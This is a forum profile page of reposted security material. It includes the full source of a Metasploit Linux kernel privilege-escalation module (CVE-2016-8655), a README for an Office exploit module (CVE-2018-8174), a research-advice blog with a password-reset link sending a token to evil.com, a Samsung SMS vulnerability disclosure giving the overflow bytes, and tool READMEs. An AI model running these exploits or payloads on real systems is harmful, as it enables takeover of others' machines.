Jump to content

Nytro

Administrators
  • Posts

    18790
  • Joined

  • Last visited

  • Days Won

    738

Everything posted by Nytro

  1. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'AF_PACKET chocobo_root Privilege Escalation', 'Description' => %q{ This module exploits a race condition and use-after-free in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2016-8655). The bug was initially introduced in 2011 and patched in 2016 in version 4.4.0-53.74, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as Linux Mint. The target system must have unprivileged user namespaces enabled and two or more CPU cores. Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on Linux Mint 17.3 (x86_64); Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel versions 4.4.0-45-generic and 4.4.0-51-generic. }, 'License' => MSF_LICENSE, 'Author' => [ 'rebel', # Discovery and chocobo_root.c exploit 'Brendan Coles' # Metasploit ], 'DisclosureDate' => 'Aug 12 2016', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'AKA', 'chocobo_root.c' ], [ 'EDB', '40871' ], [ 'CVE', '2016-8655' ], [ 'BID', '94692' ], [ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ], [ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ], [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ], [ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ], [ 'URL', 'https://usn.ubuntu.com/3151-1/' ], [ 'URL', 'https://www.securitytracker.com/id/1037403' ], [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ] ], 'DefaultTarget' => 0)) register_options [ OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]), OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), ] end def timeout datastore['TIMEOUT'].to_i end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data end def upload_and_chmodx(path, data) upload path, data cmd_exec "chmod +x '#{path}'" end def upload_and_compile(path, data) upload "#{path}.c", data gcc_cmd = "gcc -o #{path} #{path}.c -lpthread" if session.type.eql? 'shell' gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" end output = cmd_exec gcc_cmd rm_f "#{path}.c" unless output.blank? print_error output fail_with Failure::Unknown, "#{path}.c failed to compile" end cmd_exec "chmod +x #{path}" end def exploit_data(file) path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file fd = ::File.open path, 'rb' data = fd.read fd.stat.size fd.close data end def live_compile? return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') if has_gcc? vprint_good 'gcc is installed' return true end unless datastore['COMPILE'].eql? 'Auto' fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' end end def check version = kernel_release unless version =~ /^4\.4\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/ vprint_error "Linux kernel version #{version} is not vulnerable" return CheckCode::Safe end vprint_good "Linux kernel version #{version} is vulnerable" arch = kernel_hardware unless arch.include? 'x86_64' vprint_error "System architecture #{arch} is not supported" return CheckCode::Safe end vprint_good "System architecture #{arch} is supported" cores = get_cpu_info[:cores].to_i min_required_cores = 2 unless cores >= min_required_cores vprint_error "System has less than #{min_required_cores} CPU cores" return CheckCode::Safe end vprint_good "System has #{cores} CPU cores" unless userns_enabled? vprint_error 'Unprivileged user namespaces are not permitted' return CheckCode::Safe end vprint_good 'Unprivileged user namespaces are permitted' CheckCode::Appears end def exploit if check != CheckCode::Appears fail_with Failure::NotVulnerable, 'Target is not vulnerable' end if is_root? fail_with Failure::BadConfig, 'Session already has root privileges' end unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' fail_with Failure::BadConfig, "#{base_dir} is not writable" end # Upload exploit executable executable_name = ".#{rand_text_alphanumeric rand(5..10)}" executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' upload_and_compile executable_path, exploit_data('chocobo_root.c') else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx executable_path, exploit_data('chocobo_root') end # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" upload_and_chmodx payload_path, generate_payload_exe # Launch exploit print_status "Launching exploit (Timeout: #{timeout})..." output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout output.each_line { |line| vprint_status line.chomp } print_status "Cleaning up #{payload_path} and #{executable_path}.." rm_f executable_path rm_f payload_path end end Sursa: https://www.exploit-db.com/exploits/44696/?rss&amp;utm_source=dlvr.it&amp;utm_medium=twitter
  2. CVE-2018-8174-msf This is a metasploit module which creates a malicious word document to exploit CVE-2018-8174 - VBScript memory corruption vulnerability. This module is a very quick port and uses the exploit sample that was found in the wild. The exploit works only for Microsoft Office 32-bit. There are a lot of things that need to get better at this module but I will update it in the future if I find some time. Installation Copy the CVE-2018-8174.rb to /usr/share/metasploit-framework/modules/exploits/windows/fileformat/ Copy the CVE-2018-8174.rtf to /usr/share/metasploit-framework/data/exploits/ The exploit doesn't work very well with meterpreter shellcode so it's better to use non-staged reverse shell. Disclaimer DO NOT USE THIS SOFTWARE FOR ILLEGALL PURPOSES. THE AUTHOR DOES NOT KEEP ANY RESPONSIBILITY FOR ANY MISUSE OF THE CODE PROVIDED HERE. Sursa: https://github.com/0x09AL/CVE-2018-8174-msf
  3. Tegra is NVIDIA’s embedded Android/Linux development platform featuring a powerful SOC. It is widely used in various types of devices such as smartphones, game consoles, and of course the automotive systems. Based on the Tegra-powered processors, the Tesla car boasts advanced infotainment and instrument cluster systems. So that during the last two years of Tesla security research, we gained lots of experience related to the Tegra platform. In this talk, we briefly analyze some known vulnerabilities related to Tegra, and then we will talk about the implementation of NVMAP, which is a unified memory management interface on Tegra. finally, we’ll share some interesting vulnerabilities we found in the NVMAP interface, such as denial of service, sensitive memory leak, and local privilege escalation. *** Sen Nie is a security researcher of Keen Lab. Currently his research is mainly focused on car hacking, before that he has many years’ research experiences on program analysis, such as symbolic execution, smart fuzzing and other vulnerability detection technologies.
  4. In the past few years, data only kernel exploitation has been on the rise, since 2011 abusing and attacking Desktop heap objects, to gain a higher exploit primitives, was seen in many exploits. Moving forward to 2015 the focus has changed to GDI subsystem, and the discovery of the GDI Bitmaps objects, abuse, as well as in 2017 the GDI Palettes object abuse technique was released at DefCon 25, all of these techniques aim to, gain arbitrary/relative kernel memory read/write, to further the exploit chain. In this talk we will focus on some of the discovered techniques and objects, and how we were able using Type Isolation released in RS4 to mitigate those exploitation techniques. *** Ian Kronquist enjoys working at the confluence of systems programming and security, building mitigations for Windows kernel vulnerabilities at Microsoft. He previously worked on a hypervisor designed to detect and stop malware at an antivirus startup called Barkly Protects in Boston, Massachusetts. Ian graduated from Oregon State University with a BS in Computer Science, and spent his college years working at the OSU Open Source Lab. Ian has traveled throughout Europe and Asia and spent a year studying the Turkish language and folk music in Southern Turkey. Saif is a security engineer in the Microsoft Security Response Center’s Vulnerability & Mitigations team. He has a keen interest in exploit development and sharing everything he learns. He spends his time doing vulnerability research against Microsoft products and understanding new exploitation techniques and their real world applications.
  5. So you want to be a web security researcher? James Kettle | 23 May 2018 at 14:00 UTC Are you interested in pushing hacking techniques beyond the current state of the art and sharing your findings with the infosec community? In this post I’ll share some guidance on web security research, shaped by the opportunities and pitfalls I’ve experienced while pursuing this path myself. Breaking stuff for a living Most research is about taking existing techniques that bit further, so the first step is to get well acquainted with the current state of the art. The fastest way to achieve this is to get a job where you spend most of your time applying web hacking techniques. A lot of good people have shared detailed advice on getting into the security industry, so I’ll keep this section brief. I recommend a practice-focused approach starting with the OWASP Broken Web apps, moving on to more realistic challenges like my own hackxor.net, advancing through soft, low-reward targets on HackerOne and BugCrowd, and then finally onto well established high-payout bounty programs. Once you have a few publicly disclosed vulnerabilities it should be pretty easy to join a security consultancy and spend every day hacking stuff. There are plenty of free online resources to help you on the way, including our Burp methodology, HackerOne's Hacker101, and the OWASP testing guide. As for books, I’d recommend reading the WebApp Hacker’s Handbook, and The Tangled Web. Moving beyond known techniques Once you start working full time breaking stuff, you’ll initially learn loads but after a while your technical expertise will plateau unless you make a concerted effort to keep learning. Hunt forgotten knowledge Everyone knows you’re meant to keep up with new developments by monitoring industry experts, news aggregates and security conferences. However, to exclusively follow new developments is to overlook a treasure trove of forgotten and overlooked research. Every time you read a good quality blog post, read the entire archive. This will often unveil invaluable, forgotten tidbits of information. For example, take this post by RSnake about DNS rebinding written in 2009. DNS rebinding completely bypasses IP/firewall based access controls on websites, and the only effective way to mitigate it is by making your application whitelist the HTTP Host header. And yet at the time, people quickly assumed it was mitigated by browsers; this forgotten vulnerability only re-entered common awareness with a string of exploits nine years later. Perusing archives will also help you avoid wasting time replicating work that’s already been done by someone else, such as re-inventing a CSS attack one decade later. That said, some research is genuinely hard to find so occasional duplication is inevitable. I've had a published technique collision with one researcher only for both of us to discover that kuza55 had done the same thing five years prior. So, do your best to avoid duplicating research but if it happens anyway don’t panic - it happens to all of us. Collect diversity To connect threads and spot opportunities that other people miss, it’s crucial to collect information from a range of different sources. For a start, don’t limit yourself to reading security content - you’ll quickly find documentation can also serve as an exploit construction manual. Again, and this may be pretty obvious, but as well as trying to solve problems by Googling and posing well phrased questions to Twitter/Reddit/StackOverflow, ensure you ask colleagues - there’s a huge amount of knowledge floating around the community that people haven’t opted to share publicly. Beyond that, try to ensure your own experiences are diverse too. Doing black-box pentests for a security consultancy should expose you to a broad range of external and internal web applications, the likes of which you’ll rarely encounter in a bug bounty program. But the time constraints will rob you of the chance to understand an application with the familiarity that comes from months of bug bounty hunting with a single target. And although it’s often slow and constrained, white-box source code reviews can offer an irreplaceable alternative perspective, prompting attacks a black-box tester would never conceive. To nurture research, you ideally want a healthy mix of all three. Further experiences like playing CTFs and coding web applications can also add useful perspectives. No idea is too stupid One of the worst traps to fall into is dooming a great idea by assuming it won’t work and not trying it, because “someone else would have noticed it already” or “that is too dumb to work”. I’ve definitely fallen for this one before - one piece of research arrived two years later than it should have done thanks to such a mistake. Whether it's bypassing authentication by trying to login with the same password repeatedly, or breaking into a Google administration page by switching from your laptop to your phone, the path to your next great exploit may well require a really stupid idea. Iterate, invent, share Iterate The easiest way to get started is to find some promising research by someone else, build on it by mixing in other techniques, then apply your new approach to some live targets to see if anything interesting happens For example, this post on CORS misconfigurations pointed out an interesting behaviour and suggested that this behaviour was prevalent, but stopped short of exploring the impact on individual websites. I took this concept and applied it to bug bounty websites where I could legally explore the impact and try my hand at evading any mitigations they might have. Along the way I made some enhancements using common open redirect exploit techniques, discovered the ‘null’ origin technique by reading the CORS spec, and explored cache poisoning possibilities. Nothing in this process required sudden leaps of intuition or outstanding technical knowledge, and yet the resulting presentation and blog post was easily as well received as flashier efforts. Invent Iterating on other people’s work is great, but the best research often seems to appear out of nowhere, be it Relative Path Overwrite or Web Cache Deception. My view is that such discoveries are caused by personal experiences that act as hints. I refer to these as leads or breadcrumbs as they’re often cryptic and it may take quite a few of them to guide you all the way to a useful discovery. For example, in 2011 I was trying to crack the CSRF protection used by addons.mozilla.org. I had bypassed the token check, but they also validated that the host in the Referer header matched the current site. I asked for help on the sla.ckers forum, and ‘barbarianbob’ spotted that Django determines the current site’s host by looking at the HTTP Host header, and this could be overridden with the X-Forwarded-Host header. This could be combined with a Flash header injection vulnerability to bypass the CSRF check, but more importantly it was the first breadcrumb - it hinted that applications may rely on the host header to know their current location. A while later, I took a look at the source code of Piwik’s password reset function and found a line that looked something like: $passwordResetLink = getCurrentUrlWithoutQueryString() + $secretToken Aha, I thought. Piwik uses PHP which has hilarious path handling, so I can request a password reset at http://piwik.com/reset.php/foo;http://evil.com resulting in an email with two links, and the secret token being sent to evil.com. This idea worked, got me a bounty, and laid the foundation for the subsequent finding. The third and final crumb was the the way Piwik tried to patch this vulnerability - they replaced getCurrentUrlWithoutQueryString() with getCurrentUrlWithoutFileName(). This meant that I couldn’t use the path for an exploit anymore. Thanks to the encounter with Django earlier, I decided to dig further into the code to find how Piwik determined what the current host name was, and discovered that like Django, they used the HTTP host header, meaning I could easily generate poisoned password reset emails. As it turned out, this technique worked on addons.mozilla.org too, and Gallery, and Symfony, and Drupal, and a whole host of other sites, finally leading to Practical HTTP Host Header Attacks. By spelling out the discovery process in such a verbose way, I’ve hopefully demystified the research and made it look less like an idea spontaneously appearing out of the blue. Viewed from this perspective, it looks like the core skill (beyond pre-existing knowledge and breadth of experience) lies in recognising these breadcrumbs and persistently chasing after them. I can’t quite articulate how to do this yet, but I do know to treat as a lead anything that makes you say “this makes no sense”. Share Finally, it’s crucial to share your research with the community. This will help increase your profile and perhaps persuade your employer to allocate you some more research time. Beyond that, it will help you avoid wasting time and spur further research - commenters are really good at pointing out prior work you had no idea existed, and there’s nothing more rewarding than seeing another researcher building on your ideas. Please don’t think a technique or idea isn’t worth sharing just because you don’t have ground-breaking discovery, two logos and a presentation - just post whatever you have (ideally on a blog and not just some poorly indexed locked-down platform like Twitter). When sharing research, it’s always helpful to show at least one example of your technique being applied to exploit a real application. Without this, people will inevitably have difficulty understanding it, and may doubt that it has any practical value. Finally, presentations are great for reaching a wider audience, but beware of getting caught up in the infosec circus circuit and spending your days repeating past presentations. Conclusion I have a lot more to learn about research myself, so I hope to revisit this topic in a few years with substantially more of a clue. Also, I expect other researchers have different perspectives, and look forward to learning from any insights they decide to share. Finally, if you’re looking for some reading to get yourself started, I’ve created a list of various blogs that have inspired me over the years. Good luck and have fun! James Kettle @albinowax Sursa: https://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher
      • 1
      • Upvote
  6. WAP just happened to my Samsung Galaxy? This is the third in a series of blogs about how, even in 2017, SMS-based attacks on Android phones are still viable. In part one, Al described how to set up infrastructure to launch potential attacks. In part two, we described how to identify your attack surface. This blog completes the journey (for now) and describes some of the bugs that we found, potential attack scenarios and the process of responsible disclosure that we followed to get the bugs fixed. By Tom Court and Neil Biggs 24 Jan 2017 Mobile, Product Security, Vulnerabilities and exploits TL;DR: We found bugs in Samsung Galaxy phones that can be triggered remotely via SMS, which when combined provide opportunities for ransomware peddlers. Samsung Mobile Security Team were quick to fix the issues, providing a decent example of how coordinated disclosure should happen. What is WAP Push? According to the link, the Wireless Application Protocol (WAP) suite has been in public operation since 1999. The Wireless Datagram Protocol (WDP) which forms part of the WAP suite provides a UDP-like layer to transport data between two endpoints on specific ports. WDP itself can be transported over many protocols, including SMS (the focus of this blog). WAP Push is transported on WDP and allows content to be pushed to the device with minimal (or no) user intervention. The data is encoded using WAP Binary XML (WBXML). Bugs Reading the last two paragraphs should awaken your inner vulnerability researching senses, given we are talking about a 17-year old technology transporting arbitrary data, which is potentially received and processed without user interaction. Add to that the fact that the specification for the WBXML encoding standard runs to 30 pages and you have a target that begs to be investigated. On the downside, this stuff has been around for 17 years, surely all the bugs have been found and fixed by now…right? WAP Push can be used to transport data for a multitude of applications. One application that caught our eye was the Open Mobile Alliance Client Provisioning (OMA CP) protocol that allows remote device provisioning and configuration. This sounds like a powerful capability, so let’s dig deeper! The devices we had to hand for our research were a series of Samsung Galaxy devices and so the remainder of this blog will be Samsung-centric. It is left as an exercise for the reader to investigate how this technology is handled by other vendors! Authentication Given the potential power of the OMA CP protocol, you would hope and expect that there is some level of authentication built in to stop the device blindly accepting configuration messages from anyone. Indeed, contained within the OMA CP spec is the following: “The connectivity media type may contain security information, which is transported as parameters to the media type application/vnd.wap.connectivity-wbxml. The security information consists of the message authentication code and the security method. The parameters MAC and SEC have been defined for this purpose and these MUST be supported by the WAP client.” - OMA-WAP-TS-ProvCont-V1_1-20090728-A,Section 4.3 Now let’s see if it works in practice. On Samsung Galaxy devices, including the S7 which was the newest device at the time, OMA CP messages are handled by the ‘omacp’ app. We used our SMS test rig to craft some custom OMA CP SMS messages and send them to the devices. As it turns out, our rig was able to send these messages to these devices and they were received and duly processed, despite no authentication details being present in the message. May we introduce CVE-2016-7991. It appears as though the ‘omacp’ app completely ignores the security field of the message! Silent Service In the previous scenario, the user would be presented with a prompt before the OMA CP message was acted upon. Whilst we can assume that many (most?!) users would blindly click accept just to get rid of the message, it is at least one barrier against unauthorized configuration change. The question is: are there any message types that get processed without the user being notified? We analysed the omacp app to identify any code flows where configurations are accepted without any user interaction. There were some clues that this may be possible, such as a check for “xcpSetBgInstall” which hints towards a possible background install. A function called xcpInstallWifiSetting also appeared to always be called if there were settings within the configuration message. This seemed very interesting, as we hoped that it would allow us to create a trusted Wi-Fi network profile on the phone with credentials we select, thus allowing us to stand up an access point which the phone would automatically connect to. The app makes use of a native C library "libomacp", which handles the parsing of configuration messages. This would requirea bit of reversing time to understand the message format, but as we’re lazy weideally want a quick test to see what this did. Once the app has parsed the message and established the Wi-Fi networks to create it fires off an intent to the Wi-Fi-service in the Android framework. Fortunately for us there were no permissions defined on the BroadcastReceiver in Wi-Fi-service, which meant we could ignore the WBMXL format for now and create a test app to send an intent to see what this does….. the phone then proceeded to crash, reboot, crash, repeat… With our phone now enacting groundhog day we took a closer look at what was actually happening. It appears that when the ‘omacp’ app receives an OMA CP message for setting Wi-Fi access point credentials, it fires off an intent without any user interaction that is received by the WifiServiceImpl (WifiServiceImpl.jar) code that resides within the Android framework. This then goes ahead and updates a config file(/data/misc/wifi/default_ap.conf) with the new settings. Fortunately we were able to get an adb connection to the phone, which had previously been rooted,and moved the dodgy file which stopped the phone from crashing. But what exactly in this default_ap.conf file was causing the device to crash so terribly? Here is an example of a validdefault_ap.conf, it gets written when the SET_WIFI intent is received and read by the framework every time the Wi-Fi state changes, including on boot. The code that parses this file is contained within the WifiServiceImpl.jar, specifically within the getVendorApInfoFromFile() function. This code expects each line of the config file to contain a key (ssid, password etc) and a value that is interpreted as a comma-separated list, which is parsed immediately after: As you can see from this code, the “networkCount” is derived from the number of comma-separated SSIDs, and then an assumption is made that the same number of elements are included in all other comma separated lists in the file. Given that an attacker can control the contents of this file, this assumption can easily be exploited, causing an ArrayIndexOutOfBounds exception to be thrown. This in itself would not be the end of the world if it were not for the fact that this code is not wrapped in an exception handler, meaning that when the exception occurs, it crashes the entire Android runtime and the phone reboots. As the runtime comes up again it reads the config file once more and the same happens, causing a boot-loop condition of the android runtime. This was clearly dangerous, as given the lack of permissions on the WifiService BroadcastReceiver, any app could send the com.android.intent.action.SET_WIFI intent and modify the default access point settings which causes the phone to continually crash. We confirmed that this worked on an S4, S4 Mini, S5 and Note 4, but it did not initially work on an S6 or S7. We later confirmed it was possible on these newer models (more details later). These issues have since been registered as CVE-2016-7988 (WifiService permissions) and CVE-2016-7989 (unhandled exception in Android runtime). The question then was could we trigger this over-the-air (OTA) and if so, which devices did it affect? OTA In order to trigger the bug over the air we now need to go back to the omacp app and work out the message format. The app makes use of a native C library "libomacp", which handles the parsing of configuration messages – it’s finally time to crack open IDA and do some properreversing. After a bit of IDA Pro magic we identified how to construct a WBXML encoded WAP-Push message to set some Wi-Fi settings. In the process we also found a WBXML parsing bug that is registered as CVE-2016-7990. Side Track: Bonus Bug CVE-2016-7990 - Integer Overflow inlibomacp.so Luckily, libomacp.so ships with debug symbols which makes analysis in IDA Pro *much* easier… The parser has two important primitives to understand. The first and simplest is the wssClientProvWbxmlDecoderBufferReadByte(doc,dest) function, which as the name suggests reads a byte into a destination buffer and increments the read (src)pointer. It returns success or fail (0,1). The second is the wssClientProvWbxmlDecoderBufferReadUint32(doc) function that unpacks a uint32 from a variable length field. It reads up to a total of 5 bytes using the wssClientProvWbxmlDecoderBufferReadByte() function described above, which may seem strange given a uint32 can be a maximum of 4 bytes. It reads a fifth due to the way the variable length encoding works. Having read a byte, the function treats the lower 7 bits as part of the uint32, and only if the top (8th) bit is set proceeds to read the next byte. Therefore values of < 128 can be represented in only one byte. Assuming that the number is >=128, the current cumulative value of the integer is logically shifted left 7 bits and OR’d with the 7 bits of this new byte. Again, if the top bit is set, another byte is read and the process is repeated. If the top bit is set on the 5th byte, the function returns an error and stores NULL in the return value. The bug can be found in the wssClientProcWbxmlDecoderMakeStrTable() function that is called as the final act of reading the wbxml header. This function uses the wssClientProvWbxmlDecoderReadUint32() function to read a length field from the input WBXML. It then adds 2 to this and performs a malloc(length+2). Following this it then enters a loop, calling wssClientProvWbxmlDecoderReadByte() length times or until there is no more data to read in the WBXML input. If the user-controlled length field is sufficiently large, the addition of 2 extra bytes before the malloc() will cause an integer overflow and will result in a very small number of bytes being allocated. Following this allocation, a copy is performed using length rather than length+2 or until the end of the source buffer is reached. This would result in a heap buffer overflow for length >= 0xfffffffe. In order to exploit this bug, the WBXML header must end with 0xffffffff encoded in the variable length format as 5 bytes, becoming: 0xff 0xff 0xff 0xff 0x7f Any bytes appearing in the file after this will get written into a heap allocation of 1 byte causing an arbitrary-length heap overflow. In testing, this has overwritten a variety of things including function pointers, giving the potential for remote code execution on devices up to the S5 model. The S6 and S7 models are only vulnerable to attacks via a locally installed malicious app, as explained below. Back on track: Exposure The only minor piece of good news is that initially our SET_WIFI bug did not appear to work on the most recent Samsung Galaxy devices, the S6 or S7. The S4, S4 Mini, S5 and Note 4 are pretty old, surely nobody uses them anymore? Hmmmmm. Let’s look at why this doesn’t work on the S6 and S7. As mentioned earlier, when a Wi-Fi configuration update message is received, the ‘omacp’ app fires off an intent that is picked up by a BroadcastReceiver set up by the WifiServiceImpl module within the Android runtime. On all the devices we tested, the ‘omacp’ app sent the SET_WIFI intent to: com.android.intent.action.SET_WIFI It turns out that the reason why the crash wasn’t happening with our app on the S6 and S7 was that intentionally or not, the BroadcastReceiver within WifiServiceImpl.jar is listening for com.samsung.android.intent.action.SET_WIFI but the app is still sending the older intentcom.android.intent.action.SET_WIFI. A quick tweak of the app to send this intent and our S6 and S7 are now also continually crashing. However, from a remote vulnerability perspective there would be no way to trigger this on the S6 and S7 as the omacp app will always send the old intent into the ether. Remote DoS The complexity of exploiting an Android device in recent years has escalated to the point that more often than not a chain of bugs is required to achieve the desired effect. This case is no different and we have shown here that it took two bugs to produce a viable attack vector, combined with some in-depth knowledge of the bespoke message format. If you have a rooted device, a fix for thisis to simply use adb as the phone is coming up and delete the default_ap.conffile. If your device is not rooted, the only two solutions are to factory reset the phone (losing all your data) or hope that the attacker is kind enough to send you another OMA CP message containing a valid configuration. Fixes are available Given the reversible nature of this attack (a second SMS could be sent that restored the device to its unbroken state) it does not require much imagination to construct a potential ransomware scenario for these bugs. Samsung have now released a security update that addresses these amongst other vulnerabilities and as is our usual advice, it is recommended that users prioritise the installation of these updates. Disclosure On discovering the bugs, we contacted Samsung Mobile Security and privately notified them of the issues, including proof-of-concepts where necessary. Over the course of the next three months, we worked with a very pro-active team at Samsung to help them understand the issues and get them fixed. Timeline: 17th June 2016 – Issues disclosed to vendor 21st June 2016 – Received acknowledgement from vendor 28th June 2016 – Received request for further details on one of the bugs 14th July 2016 – Received notification that all but one bug had been fixed 23rd August 2016 – Received notificationfrom vendor that all issues are fixed and that patch would be released in October 7th October 2016 – Received notification from vendor that patch is delayed until Nov 7th. 7th November 2016 – Patches released Bug IDs: SVE-2016-6542 (Samsung-specificvuln-id) CVE-2016-7988 – No Permissionson SET_WIFI Broadcast receiver CVE-2016-7989 – Unhandled ArrayIndexOutOfBounds exception in Android Runtime CVE-2016-7990 – Integer overflow in libomacp.so CVE-2016-7991 – omacp app ignores security fields in OMA CP message Video: Print Article Print this Article Subscribe for more Research like this Sign up for blog updates from Context. By signing up, you agree to Context’s Privacy & Cookie Policy and Terms & Conditions. You can withdraw your consent at any time. Popular Articles Ransomware - Minimising the threat to your business Top Tips for Responding to a Cyber Incident Ransomware - First steps to take after identifying an infection Ransomware - Identifying Patient Zero Ransomware - What is it and why should I care? About Tom Court and Neil Biggs Sursa: https://www.contextis.com/blog/wap-just-happened-my-samsung-galaxy
  7. Nytro

    GraphWave

    GraphWave Detecting similar CFG-paths from HTTP responses in a black box manner This Burp Suite extension detects similar code flows (CFG-paths) in requests and enables you to ignore them in active scans. Built with ❤︎ by Tijme Gommers – Donate via PayPal Table of Contents: Documentation Thesis Presentation Issues License Documentation Please refer to the wiki for installation and usage instructions. Our F.A.Q helps to troubleshoot any problems that might occur. Thesis Preview: latest build Please note that the thesis has been anonymised and some private information has been redacted. The source of the thesis (LaTex) is not open-source at the moment Presentation Preview: latest build Please note that the presentation has been anonymised and some private information has been redacted. The source of the presentation (LaTex) is not open-source at the moment Issues Issues or new features can be reported via the GitHub issue tracker. Please make sure your issue or feature has not yet been reported by anyone else before submitting a new one. License GraphWave is open-sourced software licensed under the MIT license. Sursa: https://github.com/tijme/graphwave
  8. Gnirehtet This project provides reverse tethering over adb for Android: it allows devices to use the internet connection of the computer they are plugged on. It does not require any root access (neither on the device nor on the computer). It works on GNU/Linux, Windows and Mac OS. Currently, it relays TCP and UDP over IPv4 traffic, but it does not support IPv6 (yet?). Flavors Two implementations of Gnirehtet are available: one in Java; one in Rust. Which one to choose? Use the Rust implementation. The native binary consumes less CPU and memory, and does not require a Java runtime environment. The relay server of Gnirehtet was initially only implemented in Java. As a benefit, the same "binary" runs on every platform having Java 8 runtime installed. It is still maintained to provide a working alternative in case of problems with the Rust version. Requirements The Android application requires at least API 21 (Android 5.0). For the Java version only, Java 8 (JRE) is required on your computer. On Debian-based distros, install the package openjdk-8-jre. adb You need a recent version of adb (where adb reverse is implemented, it works with 1.0.36). It is available in the Android SDK platform tools. On Debian-based distros, you can alternatively install the package android-tools-adb. On Windows, if you need adb only for this application, just download the platform-tools and extract the following files to the gnirehtet directory: adb.exe AdbWinApi.dll AdbWinUsbApi.dll Make sure you enabled adb debugging on your device(s). Download Download the latest release in the flavor you want. Rust Linux: gnirehtet-rust-linux64-v2.2.1.zip (SHA-256: 7ecb04bc7e2a223773dc9be66efafd39bb6cfb16b5cc4ccbe252f997c003bf6c) Windows: gnirehtet-rust-win64-v2.2.1.zip (SHA-256: 1e62a5a5ade4a5f4d0b1d4a6699feedbc727eebd808cfcc152662313a1003400) MacOS: gnirehtet-rust-macos64-v2.2.1.zip (SHA-256: 902103e6497f995e1e9b92421be212559950cca4a8b557e1f0403769aee06fc8) Then extract it. The Linux and MacOS archives contain: gnirehtet.apk gnirehtet The Windows archive contains: gnirehtet.apk gnirehtet.exe gnirehtet-run.cmd Java All platforms: gnirehtet-java-v2.2.1.zip (SHA-256: feb7fae78d1247247ae4ec89a5a01895c7fc4efa0965bdbfeb46396577f150db) Then extract it. The archive contains: gnirehtet.apk gnirehtet.jar gnirehtet gnirehtet.cmd gnirehtet-run.cmd Run (simple) Note: On Windows, replace ./gnirehtet by gnirehtet in the following commands. The application has no UI, and is intended to be controlled from the computer only. If you want to activate reverse tethering for exactly one device, just execute: ./gnirehtet run Reverse tethering remains active until you press Ctrl+C. On Windows, for convenience, you can double-click on gnirehtet-run.cmd instead (it just executes gnirehtet run, without requiring to open a terminal). The very first start should open a popup to request permission: A "key" logo appears in the status bar whenever Gnirehtet is active: Alternatively, you can enable reverse tethering for all connected devices (present and future) by calling: ./gnirehtet autorun Run You can execute the actions separately (it may be useful if you want to reverse tether several devices simultaneously). Start the relay server and keep it open: ./gnirehtet relay Install the apk on your Android device: ./gnirehtet install [serial] In another terminal, for each client, execute: ./gnirehtet start [serial] To stop a client: ./gnirehtet stop [serial] To reset the tunnel (useful to get the connection back when a device is unplugged and plugged back while gnirehtet is active): ./gnirehtet tunnel [serial] The serial parameter is required only if adb devices outputs more than one device. For advanced options, call ./gnirehtet without arguments to get more details. Run manually The gnirehtet program exposes a simple command-line interface that executes lower-level commands. You can call them manually instead. To start the relay server: java -jar gnirehtet.jar relay To install the apk: adb install -r gnirehtet.apk To start a client: adb reverse localabstract:gnirehtet tcp:31416 adb shell am broadcast -a com.genymobile.gnirehtet.START \ -n com.genymobile.gnirehtet/.GnirehtetControlReceiver To stop a client: adb shell am broadcast -a com.genymobile.gnirehtet.STOP \ -n com.genymobile.gnirehtet/.GnirehtetControlReceiver Why gnirehtet? rev <<< tethering (in Bash) Developers Read the developers page. Licence Copyright (C) 2017 Genymobile Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Articles Introducing “gnirehtet”, a reverse tethering tool for Android (French version) Gnirehtet 2: our reverse tethering tool for Android now available in Rust Gnirehtet rewritten in Rust (French version) Sursa: https://github.com/Genymobile/gnirehtet
